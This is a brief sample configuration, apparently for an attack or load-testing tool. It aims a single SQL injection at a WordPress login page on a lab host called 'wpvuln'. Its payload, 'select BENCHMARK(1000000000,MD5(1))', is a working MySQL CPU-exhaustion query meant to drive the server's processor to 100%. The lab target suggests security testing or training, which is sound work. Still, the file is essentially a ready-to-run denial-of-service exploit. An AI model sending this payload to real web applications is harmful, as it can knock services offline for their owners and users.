# This sample configuration executes a single select statement that 
# causes CPU to jump to 100% when executed against a mysql based 
# web application (like Wordpress on wpvuln).
[
    {
        # This uses the inline attribute on wpvuln to 
        # send a single SQL select statement. 
        "attack": "sql_inline",
        "base_url": "http://wpvuln/wp-login.php",
        "attribute": "inline",
        "statements": ["select BENCHMARK(1000000000,MD5(1))"]
    }
]
